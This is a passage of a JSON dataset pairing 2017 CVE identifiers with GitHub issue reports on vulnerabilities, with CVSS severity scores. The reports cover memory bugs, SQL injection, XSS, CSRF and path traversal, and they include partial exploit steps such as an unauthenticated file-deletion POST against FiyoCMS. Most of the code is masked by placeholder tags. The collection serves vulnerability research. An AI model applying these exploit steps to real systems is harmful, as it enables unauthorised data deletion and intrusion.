  6583. "Issue_Url_new": "https://github.com/supervisor/supervisor/issues/964",
  6584. "Repo_new": "supervisor/supervisor",
  6585. "Issue_Created_At": "2017-07-19T14:08:20Z",
  6586. "description": "RCE vulnerability report. Hi, I would like to report Authenticated RCE vulnerability found in supervisord latest build. Please contact me at maors APITAG",
  6587. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6588. "severity": "HIGH",
  6589. "baseScore": 8.8,
  6590. "impactScore": 5.9,
  6591. "exploitabilityScore": 2.8
  6592. },
  6593. {
  6594. "CVE_ID": "CVE-2017-11624",
  6595. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/117",
  6596. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/117",
  6597. "Repo_new": "qpdf/qpdf",
  6598. "Issue_Created_At": "2017-06-04T08:22:45Z",
  6599. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6600. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6601. "severity": "MEDIUM",
  6602. "baseScore": 5.5,
  6603. "impactScore": 3.6,
  6604. "exploitabilityScore": 1.8
  6605. },
  6606. {
  6607. "CVE_ID": "CVE-2017-11625",
  6608. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/120",
  6609. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/120",
  6610. "Repo_new": "qpdf/qpdf",
  6611. "Issue_Created_At": "2017-06-04T08:24:58Z",
  6612. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6613. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6614. "severity": "MEDIUM",
  6615. "baseScore": 5.5,
  6616. "impactScore": 3.6,
  6617. "exploitabilityScore": 1.8
  6618. },
  6619. {
  6620. "CVE_ID": "CVE-2017-11626",
  6621. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/119",
  6622. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/119",
  6623. "Repo_new": "qpdf/qpdf",
  6624. "Issue_Created_At": "2017-06-04T08:24:29Z",
  6625. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6626. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6627. "severity": "MEDIUM",
  6628. "baseScore": 5.5,
  6629. "impactScore": 3.6,
  6630. "exploitabilityScore": 1.8
  6631. },
  6632. {
  6633. "CVE_ID": "CVE-2017-11627",
  6634. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/118",
  6635. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/118",
  6636. "Repo_new": "qpdf/qpdf",
  6637. "Issue_Created_At": "2017-06-04T08:23:50Z",
  6638. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6639. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6640. "severity": "MEDIUM",
  6641. "baseScore": 5.5,
  6642. "impactScore": 3.6,
  6643. "exploitabilityScore": 1.8
  6644. },
  6645. {
  6646. "CVE_ID": "CVE-2017-11630",
  6647. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/6",
  6648. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/6",
  6649. "Repo_new": "fiyocms/fiyocms",
  6650. "Issue_Created_At": "2017-07-20T15:38:47Z",
  6651. "description": "Backuper.php $ type $ file variable have the vulnerability to delete any files. Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work Fiyo CMS version NUMBERTAG has a vulnerability to remove any file. There is no need to login in when exploiting this vulnerability The code does not correct the $_POST FILETAG Vulnerability Verification (this will remove FILETAG under Web root) Url: FILETAG POST: type = database & file = .. \\ FILETAG Referrer: FILETAG Detailed request packet POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: FILETAG Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG FILETAG Discoverer: Neusoft of Rai NUMBERTAG over",
  6652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  6653. "severity": "HIGH",
  6654. "baseScore": 7.5,
  6655. "impactScore": 3.6,
  6656. "exploitabilityScore": 3.9
  6657. },
  6658. {
  6659. "CVE_ID": "CVE-2017-11631",
  6660. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/7",
  6661. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/7",
  6662. "Repo_new": "fiyocms/fiyocms",
  6663. "Issue_Created_At": "2017-07-21T06:10:33Z",
  6664. "description": "PATHTAG $ _GET FILETAG APITAG APITAG http:// PATHTAG is the installation path of the site program APITAG Vulnerability Verification\u2460 APITAG a SQL injection attack packet that causes a response delay) APITAG URLTAG Referrer: FILETAG APITAG Detailed http request packet CODETAG The response was delayed by NUMBERTAG seconds FILETAG APITAG APITAG Vulnerability Verification\u2461 APITAG the python script for SQL injection attacks and get the current database user name) Python poc code CODETAG FILETAG Discoverer: Neusoft of Rai4over",
  6665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6666. "severity": "CRITICAL",
  6667. "baseScore": 9.8,
  6668. "impactScore": 5.9,
  6669. "exploitabilityScore": 3.9
  6670. },
  6671. {
  6672. "CVE_ID": "CVE-2017-11639",
  6673. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/588",
  6674. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/588",
  6675. "Repo_new": "imagemagick/imagemagick",
  6676. "Issue_Created_At": "2017-07-19T02:30:29Z",
  6677. "description": "Heap Overflow in APITAG APITAG accessor.h. Crash Link : URLTAG Trigger Command : ./magick convert heap APITAG output.cip Crash Detail : ERRORTAG",
  6678. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6679. "severity": "MEDIUM",
  6680. "baseScore": 6.5,
  6681. "impactScore": 3.6,
  6682. "exploitabilityScore": 2.8
  6683. },
  6684. {
  6685. "CVE_ID": "CVE-2017-11640",
  6686. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/584",
  6687. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/584",
  6688. "Repo_new": "imagemagick/imagemagick",
  6689. "Issue_Created_At": "2017-07-18T16:43:37Z",
  6690. "description": "Address Access Except in APITAG coders/tiff.c. Crash Link : URLTAG Trigger Command : ./magick convert APITAG APITAG Crash Detail : ERRORTAG",
  6691. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6692. "severity": "MEDIUM",
  6693. "baseScore": 6.5,
  6694. "impactScore": 3.6,
  6695. "exploitabilityScore": 2.8
  6696. },
  6697. {
  6698. "CVE_ID": "CVE-2017-11644",
  6699. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/587",
  6700. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/587",
  6701. "Repo_new": "imagemagick/imagemagick",
  6702. "Issue_Created_At": "2017-07-18T18:33:59Z",
  6703. "description": "Memory Leak in APITAG coders/mat.c. Crash Link : URLTAG Trigger Command : ./magick convert memory APITAG /dev/null Memory Leak Detail : ERRORTAG",
  6704. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6705. "severity": "MEDIUM",
  6706. "baseScore": 6.5,
  6707. "impactScore": 3.6,
  6708. "exploitabilityScore": 2.8
  6709. },
  6710. {
  6711. "CVE_ID": "CVE-2017-11677",
  6712. "Issue_Url_old": "https://github.com/curlyboi/hashtopus/issues/63",
  6713. "Issue_Url_new": "https://github.com/curlyboi/hashtopus/issues/63",
  6714. "Repo_new": "curlyboi/hashtopus",
  6715. "Issue_Created_At": "2017-07-26T13:55:39Z",
  6716. "description": "Hashtopus NUMBERTAG Multiple Vulnerabilities. SQL Injection (authenticated) A SQL Injection is present in FILETAG on line NUMBERTAG CODETAG APITAG of concept:_ CODETAG Reflective XSS (unauthenticated) An unauthenticated reflective cross site scripting is present on line NUMBERTAG in APITAG APITAG APITAG of concept:_ APITAG CSRF APITAG admin password to login) Cross site request forgery protection is not available on sensitive forms. CODETAG",
  6717. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6718. "severity": "MEDIUM",
  6719. "baseScore": 6.1,
  6720. "impactScore": 2.7,
  6721. "exploitabilityScore": 2.8
  6722. },
  6723. {
  6724. "CVE_ID": "CVE-2017-11680",
  6725. "Issue_Url_old": "https://github.com/s3inlc/hashtopussy/issues/241",
  6726. "Issue_Url_new": "https://github.com/hashtopolis/server/issues/241",
  6727. "Repo_new": "hashtopolis/server",
  6728. "Issue_Created_At": "2017-07-26T14:08:38Z",
  6729. "description": "APITAG NUMBERTAG Multiple Vulnerabilities. CSRF APITAG Password Change) Cross site request forgery protection is not available on sensitive forms. In the following example is possible to change the admin password: CODETAG Weak ACL Some pages and functionalities were not configured with a proper ACL. It was possible to perform the following actions as user role NUMBERTAG Add voucher Delete voucher Add new agent using the generated voucher Create new hashcat release APITAG vulnerable to Stored XSS affecting all users and roles) Delete new hashcat release The following APITAG can be used to create a new voucher with user role. Afterwards on PATHTAG is possible to show all the available vouchers. CODETAG Stored XSS APITAG by any user or role) By taking advantage of the already discussed APITAG ACL\" issue, a user would be able to create a new Hashcat Release. The XSS is triggered inside FILETAG on the following parameters: version, url and rootdir. The following APITAG is available: ERRORTAG A stored XSS, readable by any role, may trigger a privilege escalation if executed by an administrative role. Open redirect (only with valid credentials) An informational issue for the developer: It was possible to fully control the APITAG response header during the login process, to force the session to be redirected to a third party website. The following request will forward the session to Google: CODETAG Reflective XSS (affecting only authenticated users) Some reflective XSS were identified in CODETAG APITAG APITAG &page NUMBERTAG Stored XSS APITAG affecting user's session) This XSS can be triggered by adding a new notification. This attack is stored, but only readable by current user (who created it basically). The following APITAG if available: CODETAG",
  6730. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6731. "severity": "HIGH",
  6732. "baseScore": 8.8,
  6733. "impactScore": 5.9,
  6734. "exploitabilityScore": 2.8
  6735. },
  6736. {
  6737. "CVE_ID": "CVE-2017-11691",
  6738. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/867",
  6739. "Issue_Url_new": "https://github.com/cacti/cacti/issues/867",
  6740. "Repo_new": "cacti/cacti",
  6741. "Issue_Created_At": "2017-07-20T07:45:55Z",
  6742. "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG iaotian. EMAILTAG .cn APITAG From this issue : URLTAG , the Cacti vendor has published the latest NUMBERTAG to fix two XSS vuls. But I just found a new xss vul in NUMBERTAG plz donnt say its the same issue or ask why is there a new CVE number? Because it's a real vul in the latest NUMBERTAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote authenticated users to inject arbitrary web script or HTML via specially crafted HTTP Referer headers NUMBERTAG Request with the special crafted referer header: APITAG APITAG NUMBERTAG Click the APITAG button in the bottom of the page like this: FILETAG NUMBERTAG ss alert. FILETAG",
  6743. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  6744. "severity": "MEDIUM",
  6745. "baseScore": 5.4,
  6746. "impactScore": 2.7,
  6747. "exploitabilityScore": 2.3
  6748. },
  6749. {
  6750. "CVE_ID": "CVE-2017-11692",
  6751. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/519",
  6752. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/519",
  6753. "Repo_new": "jbeder/yaml-cpp",
  6754. "Issue_Created_At": "2017-07-28T03:56:49Z",
  6755. "description": "The assert can lead to dos.. The assert code URLTAG can lead to a dos attack. Trigger: APITAG crash: APITAG",
  6756. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6757. "severity": "HIGH",
  6758. "baseScore": 7.5,
  6759. "impactScore": 3.6,
  6760. "exploitabilityScore": 3.9
  6761. },
  6762. {
  6763. "CVE_ID": "CVE-2017-11703",
  6764. "Issue_Url_old": "https://github.com/libming/libming/issues/72",
  6765. "Issue_Url_new": "https://github.com/libming/libming/issues/72",
  6766. "Repo_new": "libming/libming",
  6767. "Issue_Created_At": "2017-06-07T14:55:00Z",
  6768. "description": "memory leak in APITAG . On libming latest version, a memory leak was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6769. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6770. "severity": "MEDIUM",
  6771. "baseScore": 6.5,
  6772. "impactScore": 3.6,
  6773. "exploitabilityScore": 2.8
  6774. },
  6775. {
  6776. "CVE_ID": "CVE-2017-11704",
  6777. "Issue_Url_old": "https://github.com/libming/libming/issues/76",
  6778. "Issue_Url_new": "https://github.com/libming/libming/issues/76",
  6779. "Repo_new": "libming/libming",
  6780. "Issue_Created_At": "2017-06-08T16:27:53Z",
  6781. "description": "heap buffer overflow in APITAG On libming latest version, a heap buffer overflow was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6782. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6783. "severity": "MEDIUM",
  6784. "baseScore": 6.5,
  6785. "impactScore": 3.6,
  6786. "exploitabilityScore": 2.8
  6787. },
  6788. {
  6789. "CVE_ID": "CVE-2017-11705",
  6790. "Issue_Url_old": "https://github.com/libming/libming/issues/71",
  6791. "Issue_Url_new": "https://github.com/libming/libming/issues/71",
  6792. "Repo_new": "libming/libming",
  6793. "Issue_Created_At": "2017-06-07T14:54:04Z",
  6794. "description": "memory leak in APITAG On libming latest version, a memory leak was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6795. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6796. "severity": "MEDIUM",
  6797. "baseScore": 6.5,
  6798. "impactScore": 3.6,
  6799. "exploitabilityScore": 2.8
  6800. },
  6801. {
  6802. "CVE_ID": "CVE-2017-11723",
  6803. "Issue_Url_old": "https://github.com/JojoCMS/Jojo-CMS/issues/30",
  6804. "Issue_Url_new": "https://github.com/jojocms/jojo-cms/issues/30",
  6805. "Repo_new": "jojocms/jojo-cms",
  6806. "Issue_Created_At": "2017-07-27T08:02:21Z",
  6807. "description": "a path travel vuln in jojocms . there is a path travel vuln that can delect any folder on the server, and it can be done by an unauthorized remote attacker Code PATHTAG line NUMBERTAG ERRORTAG the para $_GET FILETAG after the post FILETAG",
  6808. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  6809. "severity": "HIGH",
  6810. "baseScore": 7.5,
  6811. "impactScore": 3.6,
  6812. "exploitabilityScore": 3.9
  6813. },
  6814. {
  6815. "CVE_ID": "CVE-2017-11724",
  6816. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/624",
  6817. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/624",
  6818. "Repo_new": "imagemagick/imagemagick",
  6819. "Issue_Created_At": "2017-07-27T15:07:41Z",
  6820. "description": "Memory Leak in APITAG NUMBERTAG APITAG Memory Leak File Link : FILETAG Trigger Command : ./convert Memory Leak APITAG FILETAG Leak Detail : PATHTAG ./convert Memory Leak APITAG FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ed0 ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG f NUMBERTAG c3a NUMBERTAG d ( PATHTAG NUMBERTAG f NUMBERTAG c3b NUMBERTAG a NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG e NUMBERTAG a ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ed0 ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG f NUMBERTAG c3a NUMBERTAG d ( PATHTAG NUMBERTAG f NUMBERTAG c3b NUMBERTAG a NUMBERTAG PATHTAG )",
  6821. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6822. "severity": "MEDIUM",
  6823. "baseScore": 6.5,
  6824. "impactScore": 3.6,
  6825. "exploitabilityScore": 2.8
  6826. },
  6827. {
  6828. "CVE_ID": "CVE-2017-11728",
  6829. "Issue_Url_old": "https://github.com/libming/libming/issues/82",
  6830. "Issue_Url_new": "https://github.com/libming/libming/issues/82",
  6831. "Repo_new": "libming/libming",
  6832. "Issue_Created_At": "2017-06-08T16:35:58Z",
  6833. "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6834. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6835. "severity": "MEDIUM",
  6836. "baseScore": 5.5,
  6837. "impactScore": 3.6,
  6838. "exploitabilityScore": 1.8
  6839. },
  6840. {
  6841. "CVE_ID": "CVE-2017-11729",
  6842. "Issue_Url_old": "https://github.com/libming/libming/issues/79",
  6843. "Issue_Url_new": "https://github.com/libming/libming/issues/79",
  6844. "Repo_new": "libming/libming",
  6845. "Issue_Created_At": "2017-06-08T16:32:14Z",
  6846. "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6847. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6848. "severity": "MEDIUM",
  6849. "baseScore": 5.5,
  6850. "impactScore": 3.6,
  6851. "exploitabilityScore": 1.8
  6852. },
  6853. {
  6854. "CVE_ID": "CVE-2017-11730",
  6855. "Issue_Url_old": "https://github.com/libming/libming/issues/81",
  6856. "Issue_Url_new": "https://github.com/libming/libming/issues/81",
  6857. "Repo_new": "libming/libming",
  6858. "Issue_Created_At": "2017-06-08T16:34:13Z",
  6859. "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6860. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6861. "severity": "MEDIUM",
  6862. "baseScore": 5.5,
  6863. "impactScore": 3.6,
  6864. "exploitabilityScore": 1.8
  6865. },
  6866. {
  6867. "CVE_ID": "CVE-2017-11731",
  6868. "Issue_Url_old": "https://github.com/libming/libming/issues/84",
  6869. "Issue_Url_new": "https://github.com/libming/libming/issues/84",
  6870. "Repo_new": "libming/libming",
  6871. "Issue_Created_At": "2017-06-08T16:37:37Z",
  6872. "description": "invalid memory read in APITAG . On libming latest version, an invalid memory read was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6873. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6874. "severity": "MEDIUM",
  6875. "baseScore": 5.5,
  6876. "impactScore": 3.6,
  6877. "exploitabilityScore": 1.8
  6878. },
  6879. {
  6880. "CVE_ID": "CVE-2017-11732",
  6881. "Issue_Url_old": "https://github.com/libming/libming/issues/80",
  6882. "Issue_Url_new": "https://github.com/libming/libming/issues/80",
  6883. "Repo_new": "libming/libming",
  6884. "Issue_Created_At": "2017-06-08T16:33:06Z",
  6885. "description": "heap buffer overflow in dcputs . On libming latest version, a heap buffer overflow was found in function dcputs . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6886. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6887. "severity": "MEDIUM",
  6888. "baseScore": 5.5,
  6889. "impactScore": 3.6,
  6890. "exploitabilityScore": 1.8
  6891. },
  6892. {
  6893. "CVE_ID": "CVE-2017-11733",
  6894. "Issue_Url_old": "https://github.com/libming/libming/issues/78",
  6895. "Issue_Url_new": "https://github.com/libming/libming/issues/78",
  6896. "Repo_new": "libming/libming",
  6897. "Issue_Created_At": "2017-06-08T16:30:19Z",
  6898. "description": "null pointer dereference in stackswap . On libming latest version, a null pointer dereference read was found in function stackswap . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6899. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6900. "severity": "MEDIUM",
  6901. "baseScore": 5.5,
  6902. "impactScore": 3.6,
  6903. "exploitabilityScore": 1.8
  6904. },
  6905. {
  6906. "CVE_ID": "CVE-2017-11734",
  6907. "Issue_Url_old": "https://github.com/libming/libming/issues/83",
  6908. "Issue_Url_new": "https://github.com/libming/libming/issues/83",
  6909. "Repo_new": "libming/libming",
  6910. "Issue_Created_At": "2017-06-08T16:36:52Z",
  6911. "description": "heap buffer overflow in APITAG . On libming latest version, a heap buffer overflow was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6912. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6913. "severity": "MEDIUM",
  6914. "baseScore": 5.5,
  6915. "impactScore": 3.6,
  6916. "exploitabilityScore": 1.8
  6917. },
  6918. {
  6919. "CVE_ID": "CVE-2017-11736",
  6920. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/304",
  6921. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/304",
  6922. "Repo_new": "bigtreecms/bigtree-cms",
  6923. "Issue_Created_At": "2017-07-29T07:51:29Z",
  6924. "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG Needs an account of normal user with edit module permissions. in PATHTAG get tags parameter: APITAG call APITAG or APITAG with tags: APITAG in APITAG or APITAG CODETAG call APITAG without APITAG the tag parameter. cause sql injection to exploit NUMBERTAG login with edit module permissions NUMBERTAG get the post request of edit module. APITAG NUMBERTAG send it to sqlmap tool FILETAG",
  6925. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6926. "severity": "HIGH",
  6927. "baseScore": 8.8,
  6928. "impactScore": 5.9,
  6929. "exploitabilityScore": 2.8
  6930. },
  6931. {
  6932. "CVE_ID": "CVE-2017-11737",
  6933. "Issue_Url_old": "https://github.com/vstakhov/rspamd/issues/1738",
  6934. "Issue_Url_new": "https://github.com/rspamd/rspamd/issues/1738",
  6935. "Repo_new": "rspamd/rspamd",
  6936. "Issue_Created_At": "2017-07-08T20:15:01Z",
  6937. "description": "APITAG js executed in history page. Classification APITAG choose one option): [ ] PATHTAG loss [x] APITAG [ ] Serious bug [ ] Other bug [ ] Feature [ ] Enhancement Reproducibility APITAG choose one option): [X] Always [ ] Sometimes [ ] Rarely [ ] Unable [ ] I didn\u2019t try [ ] Not applicable Rspamd version NUMBERTAG Operation system, CPU, memory and environment: Description APITAG provide a descriptive summary of the issue): It seams that that the webui does not handle subjects correctly and executes javascript. Maybe other columns are affected also. Compile errors (if any): Steps to reproduce: Send mail with APITAG in subject. Expected results: Show subject Actual results: Alertbox pops up, no subjects shown Debugging information (see details [here URLTAG : Configuration: Additional information:",
  6938. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6939. "severity": "MEDIUM",
  6940. "baseScore": 6.1,
  6941. "impactScore": 2.7,
  6942. "exploitabilityScore": 2.8
  6943. },
  6944. {
  6945. "CVE_ID": "CVE-2017-11742",
  6946. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/82",
  6947. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/82",
  6948. "Repo_new": "libexpat/libexpat",
  6949. "Issue_Created_At": "2017-07-14T20:08:55Z",
  6950. "description": "Windows APITAG DLL hijacking vulnerability. Starting with NUMBERTAG libexpat added a APITAG call to load the APITAG Windows system DLL to improve random numbers. This call however is prone to a known FILETAG , with no (trivial) way to opt out from this by apps making use of libexpat. The attack works by building a tailor made APITAG that exports the function required and called by libexpat, and copying that DLL to the directory of the user application or to the current directory. My (already proposed in URLTAG patch is this: CODETAG It will resolve the problem for Windows Vista and newer versions, thus covering all officially supported Windows versions. For older versions the generally recommended method is to detect APITAG directory and prepend that to the loaded DLL name.",
  6951. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6952. "severity": "HIGH",
  6953. "baseScore": 7.8,
  6954. "impactScore": 5.9,
  6955. "exploitabilityScore": 1.8
  6956. },
  6957. {
  6958. "CVE_ID": "CVE-2017-11744",
  6959. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/13564",
  6960. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/13564",
  6961. "Repo_new": "modxcms/revolution",
  6962. "Issue_Created_At": "2017-07-30T12:15:21Z",
  6963. "description": "Stored XSS in MOD NUMBERTAG System Settings module. Summary I found two stored XSS in MOD NUMBERTAG System Settings APITAG \"key\" and \"name\" parameters in the following request are vulnerable to XSS vulnerability. This malicious payload will be trigerred by every user, when they visit this module. Step to reproduce Example request, which creates new setting with malicious $key and malicious $name: CODETAG Observed behavior A small popup will come up. APITAG FILETAG Environment MOD NUMBERTAG apache NUMBERTAG mysql NUMBERTAG php NUMBERTAG",
  6964. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6965. "severity": "MEDIUM",
  6966. "baseScore": 6.1,
  6967. "impactScore": 2.7,
  6968. "exploitabilityScore": 2.8
  6969. },
  6970. {
  6971. "CVE_ID": "CVE-2017-11746",
  6972. "Issue_Url_old": "https://github.com/inversepath/tenshi/issues/6",
  6973. "Issue_Url_new": "https://github.com/f-secure-foundry/tenshi/issues/6",
  6974. "Repo_new": "f-secure-foundry/tenshi",
  6975. "Issue_Created_At": "2017-07-28T19:00:39Z",
  6976. "description": "Tenshi should create its PID file before dropping privileges. As part of the recent APITAG init script changes, I found the following vulnerability regarding signal handling. Basically, tenshi should creates its PID file before it drops privileges to a restricted user (say, the _tenshi_ user). Why? Well, imagine what you might like to do with the PID of the tenshi process: send a signal to the daemon! But if the PID file is created as the _tenshi_ user, then the _tenshi_ user can replace what's in the PID file with e.g. APITAG . Now, any attempt to stop tenshi will instead stop PID NUMBERTAG and reboot the system. To prevent that, the PID file should be created as root. After this change is made, I'll need to fix the init script once more to make sure that the restricted user can't write to the _directory_ containing its PID file (for the same reasons). From a quick glance, it looks like the other init scripts have the same problem.",
  6977. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6978. "severity": "HIGH",
  6979. "baseScore": 7.5,
  6980. "impactScore": 3.6,
  6981. "exploitabilityScore": 3.9
  6982. },
  6983. {
  6984. "CVE_ID": "CVE-2017-11747",
  6985. "Issue_Url_old": "https://github.com/tinyproxy/tinyproxy/issues/106",
  6986. "Issue_Url_new": "https://github.com/tinyproxy/tinyproxy/issues/106",
  6987. "Repo_new": "tinyproxy/tinyproxy",
  6988. "Issue_Created_At": "2017-07-28T21:25:54Z",
  6989. "description": "tinyproxy should create its PID file before dropping privileges. Summary The tinyproxy daemon should create its PID file before dropping privileges. This represents a minor security issue; additional factors are needed to make it exploitable. Description The purpose of the PID file is to hold the PID of the running daemon, so that later it can be stopped, restarted, or otherwise signalled (many daemons reload their configurations in response to a SIGHUP). To fulfill that purpose, the contents of the PID file need to be trustworthy. If the PID file is writable by a non root user, then he can replace its contents with the PID of a root process. Afterwards, any attempt to signal the PID contained in the PID file will instead signal a root process chosen by the non root user (a vulnerability). This is commonly exploitable by init scripts that are run as root and which blindly trust the contents of their PID files. If one daemon flushes its cache in response to SIGUSR2 and another daemon drops all connections in response to SIGUSR2, it is not hard to imagine a denial of service by the user of the first daemon against the second. Exploitation There is only a risk of exploitation when some other user relies on the data in the PID file. But you have to wonder, what's the point of the PID file if not to provide the PID to other people? Any situation where the PID file is used is therefore suspicious.",
  6990. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  6991. "severity": "MEDIUM",
  6992. "baseScore": 5.5,
  6993. "impactScore": 3.6,
  6994. "exploitabilityScore": 1.8
  6995. },
  6996. {
  6997. "CVE_ID": "CVE-2017-11750",
  6998. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/632",
  6999. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/632",
  7000. "Repo_new": "imagemagick/imagemagick",
